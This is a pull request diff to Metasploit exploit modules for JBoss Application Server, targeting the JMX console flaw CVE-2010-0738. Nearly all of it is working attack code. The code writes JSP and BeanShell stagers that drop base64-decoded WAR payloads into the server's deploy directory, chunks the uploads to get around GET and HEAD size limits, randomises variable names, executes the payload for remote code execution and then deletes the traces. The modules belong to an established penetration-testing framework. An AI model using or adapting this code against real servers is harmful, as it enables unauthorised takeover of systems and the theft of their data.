### PR TITLE
JBOSS exploits update (meterpretify jboss_deploymentfilerepository)

### DIFF
--- a/modules/exploits/multi/http/jboss_bshdeployer.rb
+++ b/modules/exploits/multi/http/jboss_bshdeployer.rb
@@ -100,8 +100,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def exploit
-		@previous_basic_auth_user = datastore['BasicAuthUser']
-		@previous_basic_auth_pass = datastore['BasicAuthPass']
 		datastore['BasicAuthUser']	= datastore['USERNAME']
 		datastore['BasicAuthPass']	= datastore['PASSWORD']
 
@@ -345,10 +343,5 @@ EOT
 			})
 		end
 		res
-	end
-
-	def cleanup
-		datastore['BasicAuthUser'] = @previous_basic_auth_user
-		datastore['BasicAuthPass'] = @previous_basic_auth_pass
 	end
 end

--- a/modules/exploits/multi/http/jboss_bshdeployer.rb
+++ b/modules/exploits/multi/http/jboss_bshdeployer.rb
@@ -90,11 +90,12 @@ class Metasploit3 < Msf::Exploit::Remote
 				Opt::RPORT(8080),
 				OptString.new('USERNAME',	[ false, 'The username to authenticate as' ]),
 				OptString.new('PASSWORD',	[ false, 'The password for the specified username' ]),
-				OptString.new('JSP',		   [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),
+				OptString.new('JSP',	   [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),
 				OptString.new('APPBASE',	[ false, 'Application base name, (default: random)', nil ]),
 				OptString.new('PATH',		[ true,  'The URI path of the JMX console', '/jmx-console' ]),
-				OptString.new('VERB',		[ true,  'The HTTP verb to use (for CVE-2010-0738)', 'POST' ]),
-				OptString.new('PACKAGE',   [ true,  'The package containing the BSHDeployer service', 'auto' ])
+				OptString.new('PACKAGE',   [ true,  'The package containing the BSHDeployer service', 'auto' ]),
+				OptEnum.new('VERB', [true, 'HTTP Method to use (for CVE-2010-0738)', 'POST', ['GET', 'POST', 'HEAD']])
+
 			], self.class)
 	end
 
@@ -106,10 +107,41 @@ class Metasploit3 < Msf::Exploit::Remote
 		jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
 		app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))
 
-		verb = datastore['VERB']
-		if (verb != 'GET' and verb != 'POST')
-			verb = 'HEAD'
-		end
+
+		# Dynamic variables, only used if we need a stager
+		stager_base = rand_text_alpha(8+rand(8))
+		stager_jsp_name = rand_text_alpha(8+rand(8))
+		content_var = rand_text_alpha(8+rand(8))
+		decoded_var = rand_text_alpha(8+rand(8))
+		file_path_var = rand_text_alpha(8+rand(8))
+		jboss_home_var = rand_text_alpha(8+rand(8))
+		fos_var = rand_text_alpha(8+rand(8))
+
+
+		# The following jsp script will write the exploded WAR file to the deploy/
+		# directory. This is used to bypass the size limit for GET/HEAD requests
+		stager_jsp = <<-EOT
+<%@page import="java.io.*,
+		java.util.*,
+		sun.misc.BASE64Decoder"
+%>
+<%
+	if (request.getParameter("#{content_var}") != null) {
+		String #{jboss_home_var} = System.getProperty("jboss.server.home.dir");
+		String #{file_path_var} = #{jboss_home_var} + "/deploy/" + "#{app_base}.war";
+		try {
+			String #{content_var} = "";
+			#{content_var} = request.getParameter("#{content_var}");
+			FileOutputStream #{fos_var} = new FileOutputStream(#{file_path_var});
+			byte[] #{decoded_var} = new BASE64Decoder().decodeBuffer(#{content_var});
+			#{fos_var}.write(#{decoded_var});
+			#{fos_var}.close();
+		}
+		catch(Exception e){ }
+	}
+%>
+
+EOT
 
 		p = payload
 		mytarget = target
@@ -141,9 +173,103 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		encoded_payload = Rex::Text.encode_base64(war_data).gsub(/\n/, '')
 
+		if datastore['VERB'] == 'POST' then
+			deploy_payload_bsh(encoded_payload, app_base)
+		else
+			# We need to deploy a stager first
+			encoded_stager_jsp = Rex::Text.encode_base64(stager_jsp).gsub(/\n/, '')
+			deploy_stager_bsh(encoded_stager_jsp, stager_base, stager_jsp_name)
+
+			# now we call the stager to deploy our real payload war
+			stager_uri = '/' + stager_base + '/' + stager_jsp_name + '.jsp'
+			payload_data = "#{content_var}=#{Rex::Text.uri_encode(encoded_payload)}"
+			print_status("Calling stager to deploy final payload")
+			call_uri_mtimes(stager_uri, 5, 'POST', payload_data)
+		end
+
+		#
+		# EXECUTE
+		#
+		uri = '/' + app_base + '/' + jsp_name + '.jsp'
+		print_status("Calling JSP file with final payload...")
+		print_status("Executing #{uri}...")
+
+		# The payload doesn't like POST requests
+		tmp_verb = datastore['VERB']
+		tmp_verb = 'GET' if tmp_verb == 'POST'
+		call_uri_mtimes(uri, 5, tmp_verb)
+
+
+		#
+		# DELETE
+		#
+		# The WAR can only be removed by physically deleting it, otherwise it
+		# will get redeployed after a server restart.
+		delete_script = <<-EOT
+String jboss_home = System.getProperty("jboss.server.home.dir");
+new File(jboss_home + "/deploy/#{app_base + '.war'}").delete();
+EOT
+
+		delete_stager_script = <<-EOT
+String jboss_home = System.getProperty("jboss.server.home.dir");
+new File(jboss_home + "/deploy/#{stager_base + '.war/' + stager_jsp_name + '.jsp'}").delete();
+new File(jboss_home + "/deploy/#{stager_base + '.war'}").delete();
+new File(jboss_home + "/deploy/#{app_base + '.war'}").delete();
+EOT
+
+		delete_script = delete_stager_script if datastore['VERB'] != 'POST'
+
+		print_status("Undeploying #{uri} by deleting the WAR file via BSHDeployer...")
+		res = invoke_bshscript(delete_script, @pkg)
+		if !res
+			print_error("WARNING: Unable to remove WAR [No Response]")
+		end
+		if (res.code < 200 || res.code >= 300)
+			print_error("WARNING: Unable to remove WAR [#{res.code} #{res.message}]")
+		end
+
+		handler
+	end
+
+
+	def deploy_stager_bsh(encoded_stager_code, stager_base, stager_jsp_name)
+
+		jsp_file_var = rand_text_alpha(8+rand(8))
+		jboss_home_var = rand_text_alpha(8+rand(8))
+		fstream_var = rand_text_alpha(8+rand(8))
+		byteval_var = rand_text_alpha(8+rand(8))
+		stager_var = rand_text_alpha(8+rand(8))
+		decoder_var = rand_text_alpha(8+rand(8))
+
+		# The following Beanshell script will write a short stager application into the deploy
+		# directory. This stager script is then used to install the payload
+		#
+		# This is neccessary to overcome the size limit for GET/HEAD requests
+		stager_bsh_script = <<-EOT
+import java.io.FileOutputStream;
+import sun.misc.BASE64Decoder;
+
+String #{stager_var} = "#{encoded_stager_code}";
+
+BASE64Decoder #{decoder_var} = new BASE64Decoder();
+String #{jboss_home_var} = System.getProperty("jboss.server.home.dir");
+new File(#{jboss_home_var} + "/deploy/#{stager_base + '.war'}").mkdir();
+byte[] #{byteval_var} = #{decoder_var}.decodeBuffer(#{stager_var});
+String #{jsp_file_var} = #{jboss_home_var} + "/deploy/#{stager_base + '.war/' + stager_jsp_name + '.jsp'}";
+FileOutputStream #{fstream_var} = new FileOutputStream(#{jsp_file_var});
+#{fstream_var}.write(#{byteval_var});
+#{fstream_var}.close();
+EOT
+		print_status("Creating exploded WAR in deploy/#{stager_base}.war/ dir via BSHDeployer")
+		deploy_bsh(stager_bsh_script)
+	end
+
+
+	def deploy_payload_bsh(encoded_payload, app_base)
+
 		# The following Beanshell script will write the exploded WAR file to the deploy/
 		# directory
-		bsh_script = <<-EOT
+		payload_bsh_script = <<-EOT
 import java.io.FileOutputStream;
 import sun.misc.BASE64Decoder;
 
@@ -158,37 +284,38 @@ fstream.write(byteval);
 fstream.close();
 EOT
 
-
-		#
-		# UPLOAD
-		#
 		print_status("Creating exploded WAR in deploy/#{app_base}.war/ dir via BSHDeployer")
+		deploy_bsh(payload_bsh_script)
+
+	end
+
+	def deploy_bsh(bsh_script)
 		if datastore['PACKAGE'] == 'auto'
 			packages = %w{ deployer scripts }
 		else
 			packages = [ datastore['PACKAGE'] ]
 		end
 
-		pkg = nil
 		success = false
 		packages.each do |p|
 			print_status("Attempting to use '#{p}' as package")
-			res = invoke_bshscript(bsh_script, p, verb)
+			res = invoke_bshscript(bsh_script, p)
 			if !res
 				fail_with(Exploit::Failure::Unknown, "Unable to deploy WAR [No Response]")
 			end
 
-			if (res.code < 200 || res.code >= 300)
-				case res.code
+		if (res.code < 200 || res.code >= 300)
+			case res.code
 				when 401
 					print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
 					fail_with(Exploit::Failure::NoAccess, "Authentication requested: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
 				end
+
 				print_error("Upload to deploy WAR [#{res.code} #{res.message}]")
 				fail_with(Exploit::Failure::Unknown, "Invalid reply: #{res.code} #{res.message}")
 			else
 				success = true
-				pkg = p
+				@pkg = p
 				break
 			end
 		end
@@ -196,83 +323,72 @@ EOT
 		if not success
 			fail_with(Exploit::Failure::Unknown, "Failed to deploy the WAR payload")
 		end
+	end
 
 
-		#
-		# EXECUTE
-		#
-		uri = '/' + app_base + '/' + jsp_name + '.jsp'
-		print_status("Executing #{uri}...")
-
-		# The payload doesn't like POST requests
-		tmp_verb = verb
-        tmp_verb = 'GET' if (verb == 'POST')
+	def call_uri_mtimes(uri, num_attempts = 5, verb = nil, data = nil)
+		verb = datastore['VERB'] if verb.nil?
 
 		# JBoss might need some time for the deployment. Try 5 times at most and
 		# wait 5 seconds inbetween tries
-		num_attempts = 5
 		num_attempts.times do |attempt|
-			res = send_request_cgi({
-				'uri'     => uri,
-				'method'  => tmp_verb
-			}, 20)
+
+			if (verb == "POST")
+				res = send_request_cgi(
+					{
+						'uri'    => uri,
+						'method' => verb,
+						'data'   => data
+					}, 5)
+			else
+
+				uri += "?#{data}" unless data.nil?
+				res = send_request_cgi(
+					{
+						'uri'    => uri,
+						'method' => verb
+					}, 30)
+			end
 
 			msg = nil
-			if (! res)
+			if (!res)
 				msg = "Execution failed on #{uri} [No Response]"
 			elsif (res.code < 200 or res.code >= 300)
-				msg = "Execution failed on #{uri} [#{res.code} #{res.message}]"
+				msg = "http request failed to #{uri} [#{res.code}]"
 			elsif (res.code == 200)
-				print_good("Successfully triggered payload at '#{uri}'")
-				break
+				print_status("Successfully called '#{uri}'") if datastore['VERBOSE']
+				return res
 			end
 
 			if (attempt < num_attempts - 1)
 				msg << ", retrying in 5 seconds..."
-				print_error(msg)
-
+				print_status(msg) if datastore['VERBOSE']
 				select(nil, nil, nil, 5)
 			else
 				print_error(msg)
+				return res
 			end
 		end
-
-
-		#
-		# DELETE
-		#
-		# The WAR can only be removed by physically deleting it, otherwise it
-		# will get redeployed after a server restart.
-		bsh_script = <<-EOT
-String jboss_home = System.getProperty("jboss.server.home.dir");
-new File(jboss_home + "/deploy/#{app_base + '.war'}").delete();
-EOT
-
-		print_status("Undeploying #{uri} by deleting the WAR file via BSHDeployer...")
-		res = invoke_bshscript(bsh_script, pkg, verb)
-		if !res
-			print_error("WARNING: Unable to remove WAR [No Response]")
-		end
-		if (res.code < 200 || res.code >= 300)
-			print_error("WARNING: Unable to remove WAR [#{res.code} #{res.message}]")
-		end
-
-		handler
 	end
 
+
 	def auto_target
-		print_status("Attempting to automatically select a target...")
-		res = query_serverinfo
-		if not (plat = detect_platform(res))
-			fail_with(Exploit::Failure::NoTarget, 'Unable to detect platform!')
-		end
+		if datastore['VERB'] == 'HEAD' then
+			print_status("Sorry, automatic target detection doesn't work wit HEAD requests")
+		else
+			print_status("Attempting to automatically select a target...")
+			res = query_serverinfo
+			if not (plat = detect_platform(res))
+				fail_with(Exploit::Failure::NoTarget, 'Unable to detect platform!')
+			end
 
-		if not (arch = detect_architecture(res))
-			fail_with(Exploit::Failure::NoTarget, 'Unable to detect architecture!')
-		end
+			if not (arch = detect_architecture(res))
+				fail_with(Exploit::Failure::NoTarget, 'Unable to detect architecture!')
+			end
 
-		# see if we have a match
-		targets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }
+			# see if we have a match
+			targets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }
+		end
 
 		# no matching target found, use Java as fallback
 		java_targets = targets.select {|t| t.name =~ /^Java/ }
@@ -283,7 +399,8 @@ EOT
 		path = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
 		res = send_request_raw(
 			{
-				'uri'    => path
+				'uri'    => path,
+				'method' => datastore['VERB']
 			}, 20)
 
 		if (not res) or (res.code != 200)
@@ -325,7 +442,7 @@ EOT
 
 
 	# Invokes +bsh_script+ on the JBoss AS via BSHDeployer
-	def invoke_bshscript(bsh_script, pkg, verb)
+	def invoke_bshscript(bsh_script, pkg)
 		params =  'action=invokeOpByName'
 		params << '&name=jboss.' + pkg + ':service=BSHDeployer'
 		params << '&methodName=createScriptDeployment'
@@ -334,17 +451,17 @@ EOT
 		params << '&argType=java.lang.String'
 		params << '&arg1=' + rand_text_alphanumeric(8+rand(8)) + '.bsh'
 
-		if (verb == "POST")
+		if (datastore['VERB']== "POST")
 			res = send_request_cgi({
-				'method'	=> verb,
+				'method'	=> datastore['VERB'],
 				'uri'		=> datastore['PATH'] + '/HtmlAdaptor',
 				'data'	=> params
 			})
 		else
 			res = send_request_cgi({
-				'method'	=> verb,
+				'method'	=> datastore['VERB'],
 				'uri'		=> datastore['PATH'] + '/HtmlAdaptor?' + params
-			})
+			}, 30)
 		end
 		res
 	end

--- a/modules/exploits/multi/http/jboss_bshdeployer.rb
+++ b/modules/exploits/multi/http/jboss_bshdeployer.rb
@@ -204,13 +204,17 @@ EOT
 		uri = '/' + app_base + '/' + jsp_name + '.jsp'
 		print_status("Executing #{uri}...")
 
+		# The payload doesn't like POST requests
+		tmp_verb = verb
+        tmp_verb = 'GET' if (verb == 'POST')
+
 		# JBoss might need some time for the deployment. Try 5 times at most and
 		# wait 5 seconds inbetween tries
 		num_attempts = 5
-		num_attempts.times { |attempt|
+		num_attempts.times do |attempt|
 			res = send_request_cgi({
 				'uri'     => uri,
-				'method'  => 'GET'#verb
+				'method'  => tmp_verb
 			}, 20)
 
 			msg = nil
@@ -231,7 +235,7 @@ EOT
 			else
 				print_error(msg)
 			end
-		}
+		end
 
 
 		#

--- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
+++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Description' => %q{
 					This module uses the DeploymentFileRepository class in
 				JBoss Application Server (jbossas) to deploy a JSP file
-				in a minimal WAR context.
+				which then deploys the WAR file.
 			},
 			'Author'      => [ 'MC', 'Jacob Giannantonio', 'Patrick Hof', 'h0ng10' ],
 			'License'     => MSF_LICENSE,
@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					[ 'Automatic (Java based)',
 						{
 							'Arch' => ARCH_JAVA,
-							'Platform' => 'java'
+							'Platform' => 'java',
 						} ],
 
 					#
@@ -82,12 +82,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		register_options(
 			[
 				Opt::RPORT(8080),
-                OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
-                OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
+				OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
+				OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
 				OptString.new('JSP',   [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),
 				OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),
 				OptString.new('PATH',  [ true,  'The URI path of the JMX console', '/jmx-console' ]),
-				OptString.new('VERB',  [ true, "The HTTP verb to use", "POST"]),
+				OptEnum.new('VERB', [true, 'HTTP Method to use (for CVE-2010-0738)', 'POST', ['GET', 'POST', 'HEAD']])
 			], self.class)
 	end
 
@@ -95,52 +95,88 @@ class Metasploit3 < Msf::Exploit::Remote
 		jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
 		app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))
 		stager_base = rand_text_alpha(8+rand(8))
+		head_stager_jsp = rand_text_alpha(8+rand(8))
 		stager_jsp  = rand_text_alpha(8+rand(8))
-
-        p = payload
-        mytarget = target
-
-        if (target.name =~ /Automatic/)
-        	mytarget = auto_target()
-            if (not mytarget)
-            	fail_with(Exploit::Failure::NoTarget, "Unable to automatically select a target")
-            end
-            print_status("Automatically selected target \"#{mytarget.name}\"")
-        else
-        	print_status("Using manually select target \"#{mytarget.name}\"")
-        end
-        arch = mytarget.arch
-
-        # set arch/platform from the target
-        plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]
-
-        # We must regenerate the payload in case our auto-magic changed something.
-        return if ((p = exploit_regenerate_payload(plat, arch)) == nil)
-
-        # Generate the WAR containing the payload
-        war_data = p.encoded_war({
-        	:app_name => app_base,
-            :jsp_name => jsp_name,
-            :arch => mytarget.arch,
-            :platform => mytarget.platform
-        }).to_s
-
-        encoded_payload = Rex::Text.encode_base64(war_data).gsub(/\n/, '')
-
-		# Dynamic variables
 		content_var = rand_text_alpha(8+rand(8))
 		decoded_var = rand_text_alpha(8+rand(8))
 		file_path_var = rand_text_alpha(8+rand(8))
 		jboss_home_var = rand_text_alpha(8+rand(8))
-		fos_var = rand_text_alphanumeric(8+rand(8))
+		fos_var = rand_text_alpha(8+rand(8))
+		bw_var = rand_text_alpha(8+rand(8))
+
+		p = payload
+		mytarget = target
+
+		if (datastore['VERB'] == 'HEAD')
+			print_status("Unable to automatically select a target with HEAD requests")
+		else
+			if (target.name =~ /Automatic/)
+				mytarget = auto_target()
+				if (not mytarget)
+					fail_with(Exploit::Failure::NoTarget, "Unable to automatically select a target")
+				end
+				print_status("Automatically selected target \"#{mytarget.name}\"")
+			else
+				print_status("Using manually select target \"#{mytarget.name}\"")
+			end
+			arch = mytarget.arch
+		end
 
 
-        # The following jsp script will write the exploded WAR file to the deploy/
-        # directory or try to delete it
-        jsp_script = <<-EOT
+		# set arch/platform from the target
+		plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]
+
+		# We must regenerate the payload in case our auto-magic changed something.
+		return if ((p = exploit_regenerate_payload(plat, arch)) == nil)
+
+		# Generate the WAR containing the payload
+		war_data = p.encoded_war({
+			:app_name => app_base,
+			:jsp_name => jsp_name,
+			:arch => mytarget.arch,
+			:platform => mytarget.platform
+		}).to_s
+
+		encoded_payload = Rex::Text.encode_base64(war_data).gsub(/\n/, '')
+
+		# The following jsp script will write the stager  to the
+		# deploy/management directory. It is only used with HEAD/GET requests
+		# to overcome the size limit in those requests
+		head_stager_jsp_code = <<-EOT
 <%@page import="java.io.*,
-        java.util.*,
-        sun.misc.BASE64Decoder"
+	java.util.*"
+%>
+
+<%
+
+	String #{jboss_home_var} = System.getProperty("jboss.server.home.dir");
+	String #{file_path_var} = #{jboss_home_var} + "/deploy/management/" + "#{stager_base}.war/" + "#{stager_jsp}" + ".jsp";
+
+
+	if (request.getParameter("#{content_var}") != null) {
+
+			try {
+				String #{content_var} = "";
+				#{content_var} = request.getParameter("#{content_var}");
+				FileWriter #{fos_var} = new FileWriter(#{file_path_var}, true);
+				BufferedWriter #{bw_var} = new BufferedWriter(#{fos_var});
+				#{bw_var}.write(#{content_var});
+				#{bw_var}.close();
+			}
+			catch(Exception e)
+			{
+			}
+	}
+%>
+
+EOT
+
+		# The following jsp script will write the exploded WAR file to the deploy/
+		# directory or try to delete it
+		stager_jsp_code = <<-EOT
+<%@page import="java.io.*,
+		java.util.*,
+		sun.misc.BASE64Decoder"
 %>
 
 <%
@@ -151,55 +187,44 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	try {
 		String #{content_var} = "#{encoded_payload}";
-    	byte[] #{decoded_var} = new BASE64Decoder().decodeBuffer(#{content_var});
-    	FileOutputStream #{fos_var} = new FileOutputStream(#{file_path_var});
-    	#{fos_var}.write(#{decoded_var});
-    	#{fos_var}.close();
-		}
-   	catch(Exception e) 
-   	{
-   	}
+		byte[] #{decoded_var} = new BASE64Decoder().decodeBuffer(#{content_var});
+		FileOutputStream #{fos_var} = new FileOutputStream(#{file_path_var});
+		#{fos_var}.write(#{decoded_var});
+		#{fos_var}.close();
+	}
+	catch(Exception e)
+	{
+	}
 %>
 
 EOT
-		#
-		# UPLOAD stager with the payload war file
-		#
-		data =  'action=invokeOpByName'
-		data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
-		data << '&methodName=store'
-		data << '&argType=java.lang.String'
-		data << '&arg0=' + Rex::Text.uri_encode(stager_base) + '.war'
-		data << '&argType=java.lang.String'
-		data << '&arg1=' + stager_jsp 
-		data << '&argType=java.lang.String'
-		data << '&arg2=.jsp'
-		data << '&argType=java.lang.String'
-		data << '&arg3=' + Rex::Text.uri_encode(jsp_script)
-		data << '&argType=boolean'
-		data << '&arg4=True'
 
-		if (datastore['VERB'] == "POST")
-			res = send_request_cgi(
-				{
-					'uri'    => datastore['PATH'] + '/HtmlAdaptor',
-					'method' => datastore['VERB'],
-					'data'   => data
-				}, 5)
+		# Depending on the type on the verb we might use a second stager
+		if datastore['VERB'] == "POST" then
+			print_status("Deploying stager for the WAR file")
+			res = upload_file(stager_base, stager_jsp, stager_jsp_code)
 		else
-			res = send_request_cgi(
-				{
-					'uri'    =>  datastore['PATH'] + '/HtmlAdaptor;index.jsp?' + data,
-					'method' => datastore['VERB'],
-				}, 5)
+			print_status("Deploying minimal stager to upload the payload")
+			res = upload_file(stager_base, head_stager_jsp, head_stager_jsp_code)
+			head_stager_uri = "/" + stager_base + "/" + head_stager_jsp + ".jsp?"
+
+			# We split the stager_jsp_code in multipe junks and transfer on the
+			# target with multiple requests
+			current_pos = 0
+			while current_pos < stager_jsp_code.length
+				next_pos = current_pos + 5000 + rand(100)
+				junk = "#{content_var}=" + Rex::Text.uri_encode(stager_jsp_code[current_pos,next_pos])
+				print_status("Uploading second stager (#{current_pos}/#{stager_jsp_code.length})")
+				res = call_uri_mtimes(head_stager_uri + junk)
+				current_pos += next_pos
+			end
 		end
 
 
-		#
 		# Call the stager to deploy the payload war file
-        # Using HEAD may trigger a 500 Internal Server Error (at leat on 4.2.3.GA),
-        # but the file still gets written.
-        if (res.code == 200 || res.code == 500)
+		# Using HEAD may trigger a 500 Internal Server Error (at leat on 4.2.3.GA),
+		# but the file still gets written.
+		if (res.code == 200 || res.code == 500)
 			print_status("Calling stager to deploy the payload warfile (might take some time)")
 			stager_uri = '/' + stager_base + '/' + stager_jsp + '.jsp'
 			stager_res = call_uri_mtimes(stager_uri)
@@ -215,21 +240,59 @@ EOT
 			# The WAR can only be removed by physically deleting it, otherwise it
 			# will get redeployed after a server restart.
 			print_status("Undeploying stager and payload WARs via DeploymentFileRepository.remove()...")
-			res1 = delete_file(Rex::Text.uri_encode(stager_base) + '.war', stager_jsp, '.jsp')
-			res2 = delete_file('./', Rex::Text.uri_encode(stager_base) + '.war', '')
-			res3 = delete_file('./', Rex::Text.uri_encode(app_base) + '.war', '')
-			[res1, res2, res3].each do |res|
+			print_status("This might take some time, be patient...") if datastore['VERB'] == "HEAD"
+			delete_res = []
+			delete_res << delete_file(Rex::Text.uri_encode(stager_base) + '.war', stager_jsp, '.jsp')
+			delete_res << delete_file(Rex::Text.uri_encode(stager_base) + '.war', head_stager_jsp, '.jsp')
+			delete_res << delete_file('./', Rex::Text.uri_encode(stager_base) + '.war', '')
+			delete_res << delete_file('./', Rex::Text.uri_encode(app_base) + '.war', '')
+			delete_res.each do |res|
 				if !res
 					print_error("WARNING: Unable to remove WAR [No Response]")
-				end
-				if (res.code < 200 || res.code >= 300)
+				elsif (res.code < 200 || res.code >= 300)
 					print_error("WARNING: Unable to remove WAR [#{res.code} #{res.message}]")
 				end
 			end
-            
+
 			handler
 		end
 	end
+
+
+	# Upload a text file with DeploymentFileRepository.store()
+	def upload_file(base_name, jsp_name, content)
+		data =  'action=invokeOpByName'
+		data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
+		data << '&methodName=store'
+		data << '&argType=java.lang.String'
+		data << '&arg0=' + Rex::Text.uri_encode(base_name) + '.war'
+		data << '&argType=java.lang.String'
+		data << '&arg1=' + jsp_name
+		data << '&argType=java.lang.String'
+		data << '&arg2=.jsp'
+		data << '&argType=java.lang.String'
+		data << '&arg3=' + Rex::Text.uri_encode(content)
+		data << '&argType=boolean'
+		data << '&arg4=True'
+
+		if (datastore['VERB'] == "POST")
+			res = send_request_cgi(
+				{
+					'uri'    => datastore['PATH'] + '/HtmlAdaptor',
+					'method' => datastore['VERB'],
+					'data'   => data
+				}, 5)
+		else
+			res = send_request_cgi(
+				{
+					'uri'    =>  datastore['PATH'] + '/HtmlAdaptor?' + data,
+					'method' => datastore['VERB'],
+				}, 30)
+		end
+
+		res
+	end
+
 
 	# Delete a file with DeploymentFileRepository.remove().
 	def delete_file(folder, name, ext)
@@ -255,70 +318,72 @@ EOT
 				{
 					'uri'    => datastore['PATH'] + '/HtmlAdaptor;index.jsp?' + data,
 					'method' => datastore['VERB'],
-				}, 5)
+				}, 30)
 		end
 		res
 	end
 
 	# Call the URL multiple times until we have hit
 	def call_uri_mtimes(uri, num_attempts = 5)
-        verb = 'HEAD' if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
+		verb = 'HEAD' if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
 
-    	# JBoss might need some time for the deployment. Try 5 times at most and
-        # wait 5 seconds inbetween tries
-        num_attempts.times do |attempt|
-            res = send_request_cgi({
-                'uri'    => uri,
-				'method' => verb 
-            }, 20)
+		# JBoss might need some time for the deployment. Try 5 times at most and
+		# wait 5 seconds inbetween tries
+		num_attempts.times do |attempt|
+			res = send_request_cgi({
+				'uri'    => uri,
+				'method' => verb
+			}, 30)
 
-            msg = nil
-            if (!res)
-                msg = "Execution failed on #{uri} [No Response]"
-            elsif (res.code < 200 or res.code >= 300)
-                msg = "http request failed to #{uri} [#{res.code}]"
-            elsif (res.code == 200)
-                print_status("Successfully called '#{uri}'")
-                return res
-            end
-
-            if (attempt < num_attempts - 1)
-                msg << ", retrying in 5 seconds..."
-                print_status(msg)
-                select(nil, nil, nil, 5)
-            else
-                print_error(msg)
+			stripped_uri = uri[0,70] + "..."
+			msg = nil
+			if (!res)
+				msg = "Execution failed on #{stripped_uri} [No Response]"
+			elsif (res.code < 200 or res.code >= 300)
+				msg = "http request failed to #{stripped_uri} [#{res.code}]"
+			elsif (res.code == 200)
+				print_status("Successfully called '#{stripped_uri}'") if datastore['VERBOSE']
 				return res
-            end
-        end 
+			end
+
+			if (attempt < num_attempts - 1)
+				msg << ", retrying in 5 seconds..."
+				print_status(msg) if datastore['VERBOSE']
+				select(nil, nil, nil, 5)
+			else
+				print_error(msg)
+				return res
+			end
+		end
 	end
 
 
-    def auto_target
-    	print_status("Attempting to automatically select a target...")
-        res = query_serverinfo
-        if not (plat = detect_platform(res))
-        	fail_with(Exploit::Failure::NoTarget, 'Unable to detect platform!')
-        end
+	def auto_target
+		print_status("Attempting to automatically select a target...")
+		res = query_serverinfo
+		if not (plat = detect_platform(res))
+			fail_with(Exploit::Failure::NoTarget, 'Unable to detect platform!')
+		end
 
-        if not (arch = detect_architecture(res))
-        	fail_with(Exploit::Failure::NoTarget, 'Unable to detect architecture!')
-        end
+		if not (arch = detect_architecture(res))
+			fail_with(Exploit::Failure::NoTarget, 'Unable to detect architecture!')
+		end
 
-        # see if we have a match
-        targets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }
+		# see if we have a match
+		targets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }
 
-        # no matching target found, use Java as fallback
-        java_targets = targets.select {|t| t.name =~ /^Java/ }
-        return java_targets[0]
-    end
+		# no matching target found, use Java as fallback
+		java_targets = targets.select {|t| t.name =~ /^Java/ }
+		return java_targets[0]
+	end
 
 
 	def query_serverinfo
 		path = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
 		res = send_request_raw(
 			{
-				'uri'    => path
+				'uri'    => path,
+				'method' => datastore['VERB']
 			}, 20)
 
 		if (not res) or (res.code != 200)

--- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
+++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
@@ -1,5 +1,5 @@
 ##
-# $Id$
+# $Id: jboss_deploymentfilerepository.rb 15620 2012-07-12 07:33:06Z rapid7 $
 ##
 
 ##
@@ -26,9 +26,9 @@ class Metasploit3 < Msf::Exploit::Remote
 				JBoss Application Server (jbossas) to deploy a JSP file
 				in a minimal WAR context.
 			},
-			'Author'      => [ 'MC', 'Jacob Giannantonio', 'Patrick Hof' ],
+			'Author'      => [ 'MC', 'Jacob Giannantonio', 'Patrick Hof', 'h0ng10' ],
 			'License'     => MSF_LICENSE,
-			'Version'     => '$Revision$',
+			'Version'     => '$Revision: 15620 $',
 			'References'  =>
 				[
 					[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
@@ -36,26 +36,54 @@ class Metasploit3 < Msf::Exploit::Remote
 					[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ],
 				],
 			'Privileged'  => false,
-			'Platform'    => ['linux', 'windows' ],
+			'Platform'    => ['java', 'linux', 'windows' ],
 			'Targets'     =>
 				[
-					[ 'Universal',
+					#
+					# do target detection but java meter by default
+					# detect via /manager/serverinfo
+					#
+					[ 'Automatic (Java based)',
 						{
 							'Arch' => ARCH_JAVA,
-							'Payload' =>
-								{
-									'DisableNops' => true,
-								},
-						}
+							'Platform' => 'java'
+						} ],
+
+					#
+					# Platform specific targets only
+					#
+					[ 'Windows Universal',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'win'
+						},
 					],
+					[ 'Linux Universal',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'linux'
+						},
+					],
+
+					#
+					# Java version
+					#
+					[ 'Java Universal',
+						{
+							'Platform' => 'java',
+							'Arch' => ARCH_JAVA,
+						}
+					]
 				],
+
